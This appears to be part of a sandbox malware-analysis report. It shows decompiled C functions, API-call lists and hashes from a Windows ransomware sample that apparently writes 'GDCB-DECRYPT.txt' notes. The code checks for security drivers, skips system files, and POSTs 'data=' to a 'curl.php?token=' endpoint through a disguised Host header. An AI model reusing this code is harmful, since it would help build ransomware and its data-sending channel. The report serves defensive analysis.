                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                        • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                        • API String ID: 553367697-3791882466
                                        • Opcode ID: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction ID: d48cc2fa45286989a46075163706fb35882ddb295905790725ed96fe2a3e69b5
                                        • Opcode Fuzzy Hash: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction Fuzzy Hash: 5C31EDB090121DDFEB20CF91E948BEDBFB9FB01709F208159D5186A282D7BA4558CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137windowthreadregistryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				short _t42;
				void* _t49;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				if(E0F9D2F50( &(_v84.message)) != 0 || E0F9D2F50( &_v96) != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F9D2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F9D2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
							}
							goto L15;
						}
						ExitThread(_t71);
					}
					ExitThread();
				} else {
					_v84.message = 0x730066;
					_v84.wParam = 0x660064;
					_v84.lParam = 0x2e0077;
					_v84.time = 0x790073;
					_v84.pt = 0x73;
					if(E0F9D2F50( &(_v84.message)) != 0) {
						L15:
						ExitThread(0);
					}
					_t61 = E0F9D30A0(_t62, _t67, _t69);
					if(_t61 != 0) {
						goto L15;
					}
					_push(_t61);
					E0F9D2AD0();
					goto L5;
				}
			}















                                        0x0f9d2d39
                                        0x0f9d2d3a
                                        0x0f9d2d3d
                                        0x0f9d2d45
                                        0x0f9d2d4a
                                        0x0f9d2d52
                                        0x0f9d2d5a
                                        0x0f9d2d62
                                        0x0f9d2d67
                                        0x0f9d2d6f
                                        0x0f9d2d77
                                        0x0f9d2d7f
                                        0x0f9d2d8e
                                        0x0f9d2de9
                                        0x0f9d2df1
                                        0x0f9d2df9
                                        0x0f9d2e01
                                        0x0f9d2e09
                                        0x0f9d2e11
                                        0x0f9d2e22
                                        0x0f9d2e26
                                        0x0f9d2e3d
                                        0x0f9d2e41
                                        0x0f9d2e49
                                        0x0f9d2e51
                                        0x0f9d2e5f
                                        0x0f9d2e68
                                        0x0f9d2e6e
                                        0x0f9d2e73
                                        0x0f9d2e7b
                                        0x0f9d2eaf
                                        0x0f9d2eb4
                                        0x0f9d2ebc
                                        0x0f9d2ec8
                                        0x0f9d2ecf
                                        0x0f9d2ee3
                                        0x0f9d2eeb
                                        0x0f9d2eee
                                        0x0f9d2eee
                                        0x0f9d2f09
                                        0x0f9d2f17
                                        0x0f9d2f1c
                                        0x0f9d2f25
                                        0x0f9d2f17
                                        0x00000000
                                        0x0f9d2f09
                                        0x0f9d2ebf
                                        0x0f9d2ebf
                                        0x0f9d2e75
                                        0x0f9d2d9d
                                        0x0f9d2da1
                                        0x0f9d2da9
                                        0x0f9d2db1
                                        0x0f9d2db9
                                        0x0f9d2dc1
                                        0x0f9d2dd0
                                        0x0f9d2f3d
                                        0x0f9d2f3f
                                        0x0f9d2f3f
                                        0x0f9d2dd6
                                        0x0f9d2ddd
                                        0x00000000
                                        0x00000000
                                        0x0f9d2de3
                                        0x0f9d2de4
                                        0x00000000
                                        0x0f9d2de4

                                        APIs
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F9D2E19
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0F9D2E2E
                                        • LoadIconW.USER32 ref: 0F9D2E59
                                        • RegisterClassExW.USER32 ref: 0F9D2E68
                                        • ExitThread.KERNEL32 ref: 0F9D2E75
                                          • Part of subcall function 0F9D2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E7B
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2E81
                                        • CreateWindowExW.USER32 ref: 0F9D2EA7
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0F9D2EB4
                                        • ExitThread.KERNEL32 ref: 0F9D2EBF
                                          • Part of subcall function 0F9D2F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 0F9D2FA8
                                          • Part of subcall function 0F9D2F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 0F9D2FCF
                                          • Part of subcall function 0F9D2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F9D2FE3
                                          • Part of subcall function 0F9D2F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D2FFA
                                        • ExitThread.KERNEL32 ref: 0F9D2F3F
                                          • Part of subcall function 0F9D2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                          • Part of subcall function 0F9D2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                          • Part of subcall function 0F9D2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                          • Part of subcall function 0F9D2AD0: ExitThread.KERNEL32 ref: 0F9D2C47
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F9D2EC8
                                        • UpdateWindow.USER32(00000000), ref: 0F9D2ECF
                                        • CreateThread.KERNEL32 ref: 0F9D2EE3
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F9D2EEE
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F05
                                        • TranslateMessage.USER32(?), ref: 0F9D2F1C
                                        • DispatchMessageW.USER32 ref: 0F9D2F23
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F9D2F37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                        • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                        • API String ID: 3011903443-520298170
                                        • Opcode ID: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction ID: ed824f0ce8f8965badd5dc97d6c2dd60581aa0ff5608e7108fb867421c6f0b72
                                        • Opcode Fuzzy Hash: dd101fe91ddf72711ca9ebebd399a984b366423cb6c52d79be93b1cae54eaa79
                                        • Instruction Fuzzy Hash: 9751817014D301AFF3209F61CC09B5B7BE8AF44B59F20891CF684AA1C2D7B9A559CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7EF0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131networkfilememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D7EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F9D7CE0(_t64);
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t62 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f006e;
						_v52 = 0x6f006d;
						_v48 = 0x650072;
						_v44 = 0x610072;
						_v40 = 0x73006e;
						_v36 = 0x6d006f;
						_v32 = 0x63002e;
						_v28 = 0x69006f;
						_v24 = 0x6e;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63);
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000);
					return _v12;
				} else {
					return _t40;
				}
			}



























                                        0x0f9d7ef8
                                        0x0f9d7efb
                                        0x0f9d7f00
                                        0x0f9d7f03
                                        0x0f9d7f03
                                        0x0f9d7f0b
                                        0x0f9d7f22
                                        0x0f9d7f28
                                        0x0f9d7f2a
                                        0x0f9d7f31
                                        0x0f9d7f36
                                        0x0f9d7f58
                                        0x0f9d7f60
                                        0x0f9d7f63
                                        0x0f9d7f87
                                        0x0f9d7f8b
                                        0x0f9d7f98
                                        0x0f9d7fa1
                                        0x0f9d7fa8
                                        0x0f9d7faf
                                        0x0f9d7fb6
                                        0x0f9d7fbd
                                        0x0f9d7fc4
                                        0x0f9d7fcb
                                        0x0f9d7fd2
                                        0x0f9d7fd9
                                        0x0f9d7fe0
                                        0x0f9d7fe7
                                        0x0f9d7ff6
                                        0x0f9d800d
                                        0x0f9d805c
                                        0x0f9d800f
                                        0x0f9d8015
                                        0x0f9d8018
                                        0x0f9d801d
                                        0x0f9d802c
                                        0x0f9d8030
                                        0x0f9d8030
                                        0x0f9d8035
                                        0x00000000
                                        0x00000000
                                        0x0f9d8037
                                        0x0f9d8042
                                        0x0f9d8049
                                        0x0f9d8058
                                        0x00000000
                                        0x00000000
                                        0x0f9d805a
                                        0x00000000
                                        0x0f9d8058
                                        0x0f9d8030
                                        0x0f9d802c
                                        0x0f9d800d
                                        0x0f9d7ff6
                                        0x0f9d8062
                                        0x0f9d8069
                                        0x0f9d806e
                                        0x0f9d807a
                                        0x0f9d8089
                                        0x0f9d7f3e
                                        0x0f9d7f3e
                                        0x0f9d7f3e

                                        APIs
                                        • InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                        • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F9D6EE6,ipv4bot.whatismyipaddress.com,0F9DFF10), ref: 0F9D7F4F
                                        • wsprintfW.USER32 ref: 0F9D7F63
                                        • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F9D7F81
                                        • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F9D7FEE
                                        • HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0F9D8005
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8024
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0F9D8050
                                        • GetLastError.KERNEL32 ref: 0F9D805C
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D8069
                                        • InternetCloseHandle.WININET(00000000), ref: 0F9D806E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D6EE6), ref: 0F9D807A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                        • String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
                                        • API String ID: 3906118045-3956618741
                                        • Opcode ID: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction ID: add1e3e8d9089d497ee8dcb87b67e8f7400d7a7f3856858366b6aa17cbdbd84f
                                        • Opcode Fuzzy Hash: a5185331b08e407ddc99e68baf2b406a7829f8ed8850cf6cfe8c200f05a273f7
                                        • Instruction Fuzzy Hash: 38418171600218BFEB208F55DC49FEE7FBDEF44B95F208019F904A62C2C7B599648BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6790 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D6790(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}










                                        0x0f9d6799
                                        0x0f9d679c
                                        0x0f9d67a1
                                        0x0f9d67a3
                                        0x0f9d67a6
                                        0x0f9d67a9
                                        0x0f9d67aa
                                        0x0f9d67b0
                                        0x0f9d67b0
                                        0x0f9d67b3
                                        0x0f9d67b4
                                        0x0f9d67b0
                                        0x0f9d67c4
                                        0x0f9d67d1
                                        0x0f9d67e6
                                        0x00000000
                                        0x0f9d6830
                                        0x0f9d6836
                                        0x0f9d683b
                                        0x0f9d6840
                                        0x0f9d6840
                                        0x0f9d67d5
                                        0x0f9d67d5
                                        0x0f9d67db
                                        0x0f9d67db

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F9D69A3), ref: 0F9D679C
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D67A1
                                        • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F9D67CD
                                        • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F9D67E2
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F9D67EE
                                        • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F9D67FA
                                        • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F9D6806
                                        • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F9D6812
                                        • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F9D681E
                                        • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F9D682A
                                        • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0F9D6836
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi$lstrlen
                                        • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                        • API String ID: 203586893-634406045
                                        • Opcode ID: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction ID: fb9f6914023d2799385fa6110f50e1366150e3d815b812e2cf7aedb1e735d2a3
                                        • Opcode Fuzzy Hash: e7198e4cc11ab65284600a8f22f7fd72b6eea5ec06534b07424cc7c7a69f701d
                                        • Instruction Fuzzy Hash: 5F11E96220173E655A21367D9C42EEF119D8DC2BA4B758525F601F24C3DF85F61348F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D54A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136stringmemorynetworkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0F9D54A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0F9D7CE0( &_v36);
				_v24 = E0F9D5060();
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74cb6981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xf9dfb20]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xf9dfb30]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xf9dfb40]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xf9dfb50]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xf9dfb60]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xf9dfb70]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E0F9D9010( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E0F9D53A0( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E0F9D7EF0( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E0F9D5210(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74cb6981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}





















                                        0x0f9d54ab
                                        0x0f9d54ad
                                        0x0f9d54b4
                                        0x0f9d54b7
                                        0x0f9d54c2
                                        0x0f9d54d8
                                        0x0f9d54df
                                        0x0f9d54f3
                                        0x0f9d54f7
                                        0x0f9d54fc
                                        0x0f9d5501
                                        0x0f9d550a
                                        0x0f9d550a
                                        0x0f9d550c
                                        0x0f9d5518
                                        0x0f9d551e
                                        0x0f9d5520
                                        0x0f9d5529
                                        0x0f9d5531
                                        0x0f9d5539
                                        0x0f9d553e
                                        0x0f9d5546
                                        0x0f9d554b
                                        0x0f9d5553
                                        0x0f9d5558
                                        0x0f9d5560
                                        0x0f9d5565
                                        0x0f9d556d
                                        0x0f9d5572
                                        0x0f9d5578
                                        0x0f9d5587
                                        0x0f9d558d
                                        0x0f9d55a1
                                        0x0f9d55ad
                                        0x0f9d55b9
                                        0x0f9d55bf
                                        0x0f9d55c2
                                        0x0f9d55c9
                                        0x0f9d55ca
                                        0x0f9d55d2
                                        0x0f9d55d7
                                        0x0f9d55df
                                        0x0f9d55e0
                                        0x0f9d55e1
                                        0x0f9d55ea
                                        0x0f9d55eb
                                        0x0f9d55f6
                                        0x0f9d55fc
                                        0x0f9d5601
                                        0x0f9d5606
                                        0x0f9d5616
                                        0x0f9d5626
                                        0x0f9d5618
                                        0x0f9d5618
                                        0x0f9d561d
                                        0x0f9d5622
                                        0x0f9d5622
                                        0x0f9d561d
                                        0x0f9d5616
                                        0x0f9d5601
                                        0x0f9d5636
                                        0x0f9d5642
                                        0x0f9d564e
                                        0x0f9d5650
                                        0x0f9d5655
                                        0x0f9d5658
                                        0x0f9d5658
                                        0x0f9d5666
                                        0x0f9d5666
                                        0x0f9d5503
                                        0x0f9d5508
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                          • Part of subcall function 0F9D5060: Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                          • Part of subcall function 0F9D5060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                          • Part of subcall function 0F9D5060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                          • Part of subcall function 0F9D5060: wsprintfW.USER32 ref: 0F9D5166
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 0F9D54C5
                                        • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 0F9D54E5
                                        • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F9D54FA
                                        • lstrcatA.KERNEL32(00000000,data=), ref: 0F9D5518
                                        • lstrcatA.KERNEL32(00000000,0F9D582E), ref: 0F9D551E
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5572
                                        • _memset.LIBCMT ref: 0F9D558D
                                        • lstrcpyW.KERNEL32 ref: 0F9D55A1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D55B9
                                        • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0F9D55D9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0F9D5636
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D5642
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D564E
                                        • InternetCloseHandle.WININET(?), ref: 0F9D5658
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                        • String ID: POST$curl.php?token=$data=
                                        • API String ID: 186108914-1715678351
                                        • Opcode ID: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction ID: d06921e8be3cc22626783e33e12396159bc72395faba6ac99d49abac49619247
                                        • Opcode Fuzzy Hash: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction Fuzzy Hash: 9751F871D0130AABEB109BA4DC41FEEBB7CFF88301F648515FA44B2182DB786654CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

